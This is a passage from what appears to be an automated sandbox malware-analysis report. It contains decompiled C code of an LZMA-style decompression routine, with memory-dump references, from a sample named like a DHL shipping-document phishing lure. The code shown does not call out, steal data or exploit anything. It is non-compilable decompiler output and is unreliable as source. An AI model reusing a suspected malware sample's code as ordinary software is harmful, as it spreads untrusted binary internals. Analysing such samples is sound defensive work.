                        												__eax = (__ebx & 0x00000001) << __cl;
                        												__eflags = __ebx - 0xe;
                        												 *(__ebp - 0x2c) = __eax;
                        												if(__ebx >= 0xe) {
                        													__ebx = 0;
                        													 *(__ebp - 0x48) = __ecx;
                        													L102:
                        													__eflags =  *(__ebp - 0x48);
                        													if( *(__ebp - 0x48) <= 0) {
                        														__eax = __eax + __ebx;
                        														 *(__ebp - 0x40) = 4;
                        														 *(__ebp - 0x2c) = __eax;
                        														__eax =  *(__ebp - 4);
                        														__eax =  *(__ebp - 4) + 0x644;
                        														__eflags = __eax;
                        														L108:
                        														__ebx = 0;
                        														 *(__ebp - 0x58) = __eax;
                        														 *(__ebp - 0x50) = 1;
                        														 *(__ebp - 0x44) = 0;
                        														 *(__ebp - 0x48) = 0;
                        														L112:
                        														__eax =  *(__ebp - 0x40);
                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        															_t391 = __ebp - 0x2c;
                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                        															__eflags =  *_t391;
                        															goto L119;
                        														}
                        														__eax =  *(__ebp - 0x50);
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        														__eax =  *(__ebp - 0x58);
                        														__esi = __edi + __eax;
                        														 *(__ebp - 0x54) = __esi;
                        														__ax =  *__esi;
                        														__ecx = __ax & 0x0000ffff;
                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        														__eflags =  *(__ebp - 0xc) - __edx;
                        														if( *(__ebp - 0xc) >= __edx) {
                        															__ecx = 0;
                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        															__ecx = 1;
                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        															__ebx = 1;
                        															__ecx =  *(__ebp - 0x48);
                        															__ebx = 1 << __cl;
                        															__ecx = 1 << __cl;
                        															__ebx =  *(__ebp - 0x44);
                        															__ebx =  *(__ebp - 0x44) | __ecx;
                        															__cx = __ax;
                        															__cx = __ax >> 5;
                        															__eax = __eax - __ecx;
                        															__edi = __edi + 1;
                        															__eflags = __edi;
                        															 *(__ebp - 0x44) = __ebx;
                        															 *__esi = __ax;
                        															 *(__ebp - 0x50) = __edi;
                        														} else {
                        															 *(__ebp - 0x10) = __edx;
                        															0x800 = 0x800 - __ecx;
                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        															 *__esi = __dx;
                        														}
                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                        														if( *(__ebp - 0x10) >= 0x1000000) {
                        															L111:
                        															_t368 = __ebp - 0x48;
                        															 *_t368 =  *(__ebp - 0x48) + 1;
                        															__eflags =  *_t368;
                        															goto L112;
                        														} else {
                        															goto L109;
                        														}
                        													}
                        													__ecx =  *(__ebp - 0xc);
                        													__ebx = __ebx + __ebx;
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        													 *(__ebp - 0x44) = __ebx;
                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        														__ecx =  *(__ebp - 0x10);
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        														__ebx = __ebx | 0x00000001;
                        														__eflags = __ebx;
                        														 *(__ebp - 0x44) = __ebx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														L101:
                        														_t338 = __ebp - 0x48;
                        														 *_t338 =  *(__ebp - 0x48) - 1;
                        														__eflags =  *_t338;
                        														goto L102;
                        													} else {
                        														goto L99;
                        													}
                        												}
                        												__edx =  *(__ebp - 4);
                        												__eax = __eax - __ebx;
                        												 *(__ebp - 0x40) = __ecx;
                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        												goto L108;
                        											case 0x1a:
                        												L56:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													 *(__ebp - 0x88) = 0x1a;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x68);
                        												__al =  *(__ebp - 0x5c);
                        												__edx =  *(__ebp - 8);
                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        												 *( *(__ebp - 0x68)) = __al;
                        												__ecx =  *(__ebp - 0x14);
                        												 *(__ecx +  *(__ebp - 8)) = __al;
                        												__eax = __ecx + 1;
                        												__edx = 0;
                        												_t192 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t192;
                        												goto L79;
                        											case 0x1b:
                        												L75:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													 *(__ebp - 0x88) = 0x1b;
                        													goto L170;
                        												}
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__edx =  *(__ebp - 8);
                        												__cl =  *(__eax + __edx);
                        												__eax =  *(__ebp - 0x14);
                        												 *(__ebp - 0x5c) = __cl;
                        												 *(__eax + __edx) = __cl;
                        												__eax = __eax + 1;
                        												__edx = 0;
                        												_t274 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t274;
                        												__eax =  *(__ebp - 0x68);
                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												_t283 = __ebp - 0x64;
                        												 *_t283 =  *(__ebp - 0x64) - 1;
                        												__eflags =  *_t283;
                        												 *( *(__ebp - 0x68)) = __cl;
                        												L79:
                        												 *(__ebp - 0x14) = __edx;
                        												goto L80;
                        											case 0x1c:
                        												while(1) {
                        													L123:
                        													__eflags =  *(__ebp - 0x64);
                        													if( *(__ebp - 0x64) == 0) {
                        														break;
                        													}
                        													__eax =  *(__ebp - 0x14);
                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        													__eflags = __eax -  *(__ebp - 0x74);
                        													if(__eax >=  *(__ebp - 0x74)) {
                        														__eax = __eax +  *(__ebp - 0x74);
                        														__eflags = __eax;
                        													}
                        													__edx =  *(__ebp - 8);
                        													__cl =  *(__eax + __edx);
                        													__eax =  *(__ebp - 0x14);
                        													 *(__ebp - 0x5c) = __cl;
                        													 *(__eax + __edx) = __cl;
                        													__eax = __eax + 1;
                        													__edx = 0;
                        													_t414 = __eax %  *(__ebp - 0x74);
                        													__eax = __eax /  *(__ebp - 0x74);
                        													__edx = _t414;
                        													__eax =  *(__ebp - 0x68);
                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        													__eflags =  *(__ebp - 0x30);
                        													 *( *(__ebp - 0x68)) = __cl;
                        													 *(__ebp - 0x14) = _t414;
                        													if( *(__ebp - 0x30) > 0) {
                        														continue;
                        													} else {
                        														L80:
                        														 *(__ebp - 0x88) = 2;
                        														goto L1;
                        													}
                        												}
                        												 *(__ebp - 0x88) = 0x1c;
                        												goto L170;
                        										}
                        									}
                        									L171:
                        									_t544 = _t543 | 0xffffffff;
                        									goto L172;
                        								}
                        							}
                        						}
                        					}
                        					goto L1;
                        				}
                        			}














                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004073ce
                        0x004073cb
                        0x00000000
                        0x00407002

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                        • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                        • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                        • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E0040711C() {
                        				unsigned short _t531;
                        				signed int _t532;
                        				void _t533;
                        				signed int _t534;
                        				signed int _t535;
                        				signed int _t565;
                        				signed int _t568;
                        				signed int _t589;
                        				signed int* _t606;
                        				void* _t613;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					if( *(_t613 - 0x40) != 0) {
                        						 *(_t613 - 0x84) = 0xb;
                        						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                        						goto L132;
                        					} else {
                        						__eax =  *(__ebp - 0x28);
                        						L88:
                        						 *(__ebp - 0x2c) = __eax;
                        						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        						L89:
                        						__eax =  *(__ebp - 4);
                        						 *(__ebp - 0x80) = 0x15;
                        						__eax =  *(__ebp - 4) + 0xa68;
                        						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                        						L69:
                        						 *(__ebp - 0x84) = 0x12;
                        						while(1) {
                        							L132:
                        							 *(_t613 - 0x54) = _t606;
                        							while(1) {
                        								L133:
                        								_t531 =  *_t606;
                        								_t589 = _t531 & 0x0000ffff;
                        								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                        								if( *(_t613 - 0xc) >= _t565) {
                        									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                        									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                        									 *(_t613 - 0x40) = 1;
                        									_t532 = _t531 - (_t531 >> 5);
                        									 *_t606 = _t532;
                        								} else {
                        									 *(_t613 - 0x10) = _t565;
                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                        								}
                        								if( *(_t613 - 0x10) >= 0x1000000) {
                        									goto L139;
                        								}
                        								L137:
                        								if( *(_t613 - 0x6c) == 0) {
                        									 *(_t613 - 0x88) = 5;
                        									L170:
                        									_t568 = 0x22;
                        									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                        									_t535 = 0;
                        									L172:
                        									return _t535;
                        								}
                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                        								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                        								L139:
                        								_t533 =  *(_t613 - 0x84);
                        								while(1) {
                        									 *(_t613 - 0x88) = _t533;
                        									while(1) {
                        										L1:
                        										_t534 =  *(_t613 - 0x88);
                        										if(_t534 > 0x1c) {
                        											break;
                        										}
                        										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                        											case 0:
                        												if( *(_t613 - 0x6c) == 0) {
                        													goto L170;
                        												}
                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        												_t534 =  *( *(_t613 - 0x70));
                        												if(_t534 > 0xe1) {
                        													goto L171;
                        												}
                        												_t538 = _t534 & 0x000000ff;
                        												_push(0x2d);
                        												asm("cdq");
                        												_pop(_t570);
                        												_push(9);
                        												_pop(_t571);
                        												_t609 = _t538 / _t570;
                        												_t540 = _t538 % _t570 & 0x000000ff;
                        												asm("cdq");
                        												_t604 = _t540 % _t571 & 0x000000ff;
                        												 *(_t613 - 0x3c) = _t604;
                        												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                        												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                        												_t612 = (0x300 << _t604 + _t609) + 0x736;
                        												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                        													L10:
                        													if(_t612 == 0) {
                        														L12:
                        														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                        														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        														goto L15;
                        													} else {
                        														goto L11;
                        													}
                        													do {
                        														L11:
                        														_t612 = _t612 - 1;
                        														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                        													} while (_t612 != 0);
                        													goto L12;
                        												}
                        												if( *(_t613 - 4) != 0) {
                        													GlobalFree( *(_t613 - 4));
                        												}
                        												_t534 = GlobalAlloc(0x40, 0x600); // executed
                        												 *(_t613 - 4) = _t534;
                        												if(_t534 == 0) {
                        													goto L171;
                        												} else {
                        													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                        													goto L10;
                        												}
                        											case 1:
                        												L13:
                        												__eflags =  *(_t613 - 0x6c);
                        												if( *(_t613 - 0x6c) == 0) {
                        													 *(_t613 - 0x88) = 1;
                        													goto L170;
                        												}
                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                        												_t45 = _t613 - 0x48;
                        												 *_t45 =  *(_t613 - 0x48) + 1;
                        												__eflags =  *_t45;
                        												L15:
                        												if( *(_t613 - 0x48) < 4) {
                        													goto L13;
                        												}
                        												_t546 =  *(_t613 - 0x40);
                        												if(_t546 ==  *(_t613 - 0x74)) {
                        													L20:
                        													 *(_t613 - 0x48) = 5;
                        													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                        													goto L23;
                        												}
                        												 *(_t613 - 0x74) = _t546;
                        												if( *(_t613 - 8) != 0) {
                        													GlobalFree( *(_t613 - 8));
                        												}
                        												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                        												 *(_t613 - 8) = _t534;
                        												if(_t534 == 0) {
                        													goto L171;
                        												} else {
                        													goto L20;
                        												}
                        											case 2:
                        												L24:
                        												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                        												 *(_t613 - 0x84) = 6;
                        												 *(_t613 - 0x4c) = _t553;
                        												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                        												L132:
                        												 *(_t613 - 0x54) = _t606;
                        												goto L133;
                        											case 3:
                        												L21:
                        												__eflags =  *(_t613 - 0x6c);
                        												if( *(_t613 - 0x6c) == 0) {
                        													 *(_t613 - 0x88) = 3;
                        													goto L170;
                        												}
                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                        												_t67 = _t613 - 0x70;
                        												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                        												__eflags =  *_t67;
                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                        												L23:
                        												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                        												if( *(_t613 - 0x48) != 0) {
                        													goto L21;
                        												}
                        												goto L24;
                        											case 4:
                        												L133:
                        												_t531 =  *_t606;
                        												_t589 = _t531 & 0x0000ffff;
                        												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                        												if( *(_t613 - 0xc) >= _t565) {
                        													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                        													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                        													 *(_t613 - 0x40) = 1;
                        													_t532 = _t531 - (_t531 >> 5);
                        													 *_t606 = _t532;
                        												} else {
                        													 *(_t613 - 0x10) = _t565;
                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                        													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                        												}
                        												if( *(_t613 - 0x10) >= 0x1000000) {
                        													goto L139;
                        												}
                        											case 5:
                        												goto L137;
                        											case 6:
                        												__edx = 0;
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 4);
                        													__ecx =  *(__ebp - 0x38);
                        													 *(__ebp - 0x34) = 1;
                        													 *(__ebp - 0x84) = 7;
                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                        													while(1) {
                        														L132:
                        														 *(_t613 - 0x54) = _t606;
                        														goto L133;
                        													}
                        												}
                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        												__esi =  *(__ebp - 0x60);
                        												__cl = 8;
                        												__cl = 8 -  *(__ebp - 0x3c);
                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        												__ecx =  *(__ebp - 0x3c);
                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        												__ecx =  *(__ebp - 4);
                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        												__eflags =  *(__ebp - 0x38) - 4;
                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        												if( *(__ebp - 0x38) >= 4) {
                        													__eflags =  *(__ebp - 0x38) - 0xa;
                        													if( *(__ebp - 0x38) >= 0xa) {
                        														_t98 = __ebp - 0x38;
                        														 *_t98 =  *(__ebp - 0x38) - 6;
                        														__eflags =  *_t98;
                        													} else {
                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        													}
                        												} else {
                        													 *(__ebp - 0x38) = 0;
                        												}
                        												__eflags =  *(__ebp - 0x34) - __edx;
                        												if( *(__ebp - 0x34) == __edx) {
                        													__ebx = 0;
                        													__ebx = 1;
                        													goto L61;
                        												} else {
                        													__eax =  *(__ebp - 0x14);
                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        													__eflags = __eax -  *(__ebp - 0x74);
                        													if(__eax >=  *(__ebp - 0x74)) {
                        														__eax = __eax +  *(__ebp - 0x74);
                        														__eflags = __eax;
                        													}
                        													__ecx =  *(__ebp - 8);
                        													__ebx = 0;
                        													__ebx = 1;
                        													__al =  *((intOrPtr*)(__eax + __ecx));
                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        													goto L41;
                        												}
                        											case 7:
                        												__eflags =  *(__ebp - 0x40) - 1;
                        												if( *(__ebp - 0x40) != 1) {
                        													__eax =  *(__ebp - 0x24);
                        													 *(__ebp - 0x80) = 0x16;
                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        													__eax =  *(__ebp - 0x28);
                        													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        													__eax =  *(__ebp - 0x2c);
                        													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        													__eax = 0;
                        													__eflags =  *(__ebp - 0x38) - 7;
                        													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        													__al = __al & 0x000000fd;
                        													__eax = (__eflags >= 0) - 1 + 0xa;
                        													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                        													__eax =  *(__ebp - 4);
                        													__eax =  *(__ebp - 4) + 0x664;
                        													__eflags = __eax;
                        													 *(__ebp - 0x58) = __eax;
                        													goto L69;
                        												}
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x84) = 8;
                        												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                        												while(1) {
                        													L132:
                        													 *(_t613 - 0x54) = _t606;
                        													goto L133;
                        												}
                        											case 8:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__eax =  *(__ebp - 4);
                        													__ecx =  *(__ebp - 0x38);
                        													 *(__ebp - 0x84) = 0xa;
                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                        												} else {
                        													__eax =  *(__ebp - 0x38);
                        													__ecx =  *(__ebp - 4);
                        													__eax =  *(__ebp - 0x38) + 0xf;
                        													 *(__ebp - 0x84) = 9;
                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                        												}
                        												while(1) {
                        													L132:
                        													 *(_t613 - 0x54) = _t606;
                        													goto L133;
                        												}
                        											case 9:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													goto L89;
                        												}
                        												__eflags =  *(__ebp - 0x60);
                        												if( *(__ebp - 0x60) == 0) {
                        													goto L171;
                        												}
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                        												__eflags = _t259;
                        												0 | _t259 = _t259 + _t259 + 9;
                        												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                        												goto L76;
                        											case 0xa:
                        												goto L0;
                        											case 0xb:
                        												__eflags =  *(__ebp - 0x40);
                        												if( *(__ebp - 0x40) != 0) {
                        													__ecx =  *(__ebp - 0x24);
                        													__eax =  *(__ebp - 0x20);
                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        												} else {
                        													__eax =  *(__ebp - 0x24);
                        												}
                        												__ecx =  *(__ebp - 0x28);
                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        												goto L88;
                        											case 0xc:
                        												L99:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xc;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t334 = __ebp - 0x70;
                        												 *_t334 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t334;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												__eax =  *(__ebp - 0x2c);
                        												goto L101;
                        											case 0xd:
                        												L37:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xd;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												_t122 = __ebp - 0x70;
                        												 *_t122 =  *(__ebp - 0x70) + 1;
                        												__eflags =  *_t122;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        												L39:
                        												__eax =  *(__ebp - 0x40);
                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        													goto L48;
                        												}
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													goto L54;
                        												}
                        												L41:
                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        												__ecx =  *(__ebp - 0x58);
                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        												 *(__ebp - 0x48) = __eax;
                        												__eax = __eax + 1;
                        												__eax = __eax << 8;
                        												__eax = __eax + __ebx;
                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edx = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													 *(__ebp - 0x40) = 1;
                        													__cx = __ax >> 5;
                        													__eflags = __eax;
                        													__ebx = __ebx + __ebx + 1;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edx;
                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													goto L39;
                        												} else {
                        													goto L37;
                        												}
                        											case 0xe:
                        												L46:
                        												__eflags =  *(__ebp - 0x6c);
                        												if( *(__ebp - 0x6c) == 0) {
                        													 *(__ebp - 0x88) = 0xe;
                        													goto L170;
                        												}
                        												__ecx =  *(__ebp - 0x70);
                        												__eax =  *(__ebp - 0xc);
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
